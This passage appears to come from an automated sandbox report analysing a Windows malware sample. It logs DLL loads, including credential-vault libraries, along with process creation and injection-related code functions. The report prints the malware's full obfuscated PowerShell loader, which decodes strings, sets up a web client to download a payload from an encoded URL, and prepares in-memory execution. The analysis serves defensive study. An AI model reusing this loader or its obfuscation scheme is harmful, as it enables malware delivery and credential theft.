              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: pstorec.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1637195965.0000000003126000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Core.pdbo source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ore.pdbi source: powershell.exe, 00000004.00000002.1670991960.00000000078AA000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("Powershell.exe", "" <#Rastafarian Reservoiret spermatopho", "", "", "0");
              Source: Yara matchFile source: 00000004.00000002.1681623688.0000000009456000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1680885153.0000000008C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.1661877856.000000000601E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.1523751106.000001C4F4AC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Bydelsforsget)$gloBAL:RatIOnAlisERe = [sYstEM.teXT.eNCODING]::Ascii.GeTstRING($kril)$GlObAl:sKrhOVedET=$raTIonALIserE.substring($staTuslINJEn,$nonCurREntLY)<#bearhound Kadmiumforgift
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Misanalyzed $diemagstrberiske $Meis), (Primitivest @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hustelefonnumrets = [AppDomain]::CurrentDomain.GetAssemb
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Retrospektionen)), $Pie).DefineDynamicModule($Observing, $false).DefineType($Svarskrift, $Relevans, [System.MulticastDelegate])$Presti
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64string($Bydelsforsget)$gloBAL:RatIOnAlisERe = [sYstEM.teXT.eNCODING]::Ascii.GeTstRING($kril)$GlObAl:sKrhOVedET=$raTIonALIserE.substring($staTuslINJEn,$nonCurREntLY)<#bearhound Kadmiumforgift
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnq
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Rastafarian Reservoiret spermatophobia Zwitterions Nonevading Paragraferes #>;$Forjttelserne='Horsehair';<#humeral Grainier Embathe Agaty #>;$Maksimale188=$Genanvendelsesprocessernconsumably+$host.UI; function Adiabaticlly($Megafonens){If ($Maksimale188) {$Mahajan++;}$Minim=$Genanvendelsesprocesserntolerability+$Megafonens.'Length'-$Mahajan; for( $Genanvendelsesprocesser=3;$Genanvendelsesprocesser -lt $Minim;$Genanvendelsesprocesser+=4){$Farings=$Genanvendelsesprocesser;$alma+=$Megafonens[$Genanvendelsesprocesser];$Erantissenes='Nemhed';}$alma;}function Vandende($Feriers){ .($Bibliografisk) ($Feriers);}$Mealymouthedness=Adiabaticlly 'In MslioRebzVani ndlPyrlfulaEni/sco ';$Mealymouthedness+=Adiabaticlly 'Fli5Udk.Con0nel stu(DevWB gi den RodskroAmpw Tos Po Re NTilTuge I l1 Li0.ha. La0 ,i;Ann DryWTi iB.onUnd6Ham4Aff;Oxy satxUnd6 Gi4Ung;Dam MisrDiavsva:The1Tia3,ou1Inf.til0T t)Ma. BhiGsidesamcRefk FioFa,/ Vi2 Ge0For1s,o0Fll0 pe1oft0 b1 i steF oiCherstieshafTv.oFlyx .t/Cen1 B 3 Co1s m.T.l0Uds ';$Verdeners=Adiabaticlly 'se u ass B ETi,r an-JunAForG EveTrsNDepT To ';$Belard=Adiabaticlly ' UdhNint A.tLi pIdis o:st /Alg/UndsovefWor4 O l sp.JacsserhBaaoIngpBr./ Muz brWDy AB lb P,mF drUd,m TuPInd/ KoDi fiCyswKria ,rnB siGe,.sacpBeif DabUdt ';$Preindisposition=Adiabaticlly 'P,e>neu ';$Bibliografisk=Adiabaticlly 'C iI .neAurxVel ';$Formaalene='Celiectomy';$Ujordiskes='\Taxlessly199.Cho';Vandende (Adiabaticlly 'Alp$bragHiel llo H bsidAMyclopl:PerRE eeselfjanrlucAUn CArstParOFo MWh eGenT,asrBulYHs 1Pos8 Un8,ne= No$ enEUnvNcriVOm : ffAEkiP Php odMetAs iTDisA la+sy $ U UCatjJouOG,irFordOveiNedsWrykKeeeFedssmi ');Vandende (Adiabaticlly ' H $ rGs,il svO onBTilA .aLA.d:.haFOrdO,lerRbes Ork dn Kvi,ngNansGOpksA tROxfEskos DaudorLa.kt nta titBoue FyrudksDel=Try$ .nbF rERholeddADirr,andHol.sursPo pGulL ori Ent pe(T n$ Exp eR.rne .tI UnNsepD liI LesTr.p fsosynsTo iLiktHosiKl,oTrinsv )Dul ');Vandende (Adiabaticlly 'Gen[KluNLileswaTI s. nsF oeimpRshaV oITrfCHaneC,up EpOAt IsigNKurT seMYasA roN T asilGValesilRgra]Fus:Fam:Ab srepEKa,cstaukn RInoIzootLudYPatpstoRps.O FrTDeaOZencsoloGr LDre Evi=s b Utu[.urnFodeDantsan.Lumss ae seCUriuspar R IUnjT dyKdep,dorPaaoLiltUnco,ubc saOFaclR,gt nyAnkpskuEAfs]Erk:Abo:D atsk lGurssty1Ran2sle ');$Belard=$Forskningsresultaters[0];$Estimeringens=(Adiabaticlly '.nd$ BagD sLsanoskrbAntaextlTol:sknMIndaEl UB rNAleD xpEHo,RVej=CornRemEVecwBu - AkoIntB InjTaneskic eatRep Hiss OpyLn sUnrTrefeattmodo.UndnBese Aft Er. enwForEUngB omcs,uLUnciVu EDolnModTGen ');Vandende ($Estimeringens);Vandende (Adiabaticlly 'Zak$UsaManraFodu FonIm,dIl eForrInd.vaaHF.oe llaTild unesymrbeestyr[ .t$ haV meO trTrad nesa n ape LerOffsRec]K r=Har$InsM sse raBanlregy l mInjo spu latMish AreGa dF unDele Gjs Bas ,h ');$Oxyhematin=Adiabaticlly 'Ava$UnoMBluaevnu pn FudFeleForrT n. unDstyoBrnw,izn sklU,wovkka HydChoF.rviba.lskaeRig(she$VejBUnqJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,11_2_004044A4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_04C235F7 push eax; retn 07B5h4_2_04C23639
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_20902806 push ecx; ret 7_2_20902819
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044693D push ecx; ret 11_2_0044694D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DB84
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0044DB70 push eax; ret 11_2_0044DBAC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00451D54 push eax; ret 11_2_00451D61
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0A4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_0044B090 push eax; ret 12_2_0044B0CC
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00451D34 push eax; ret 12_2_00451D41
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_00444E71 push ecx; ret 12_2_00444E81
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00414060 push eax; ret 13_2_00414074
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00414060 push eax; ret 13_2_0041409C
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00414039 push ecx; ret 13_2_00414049
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_004164EB push 0000006Ah; retf 13_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00416553 push 0000006Ah; retf 13_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 13_2_00416555 push 0000006Ah; retf 13_2_004165C4
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 12_2_004047CB LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,12_2_004047CB
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
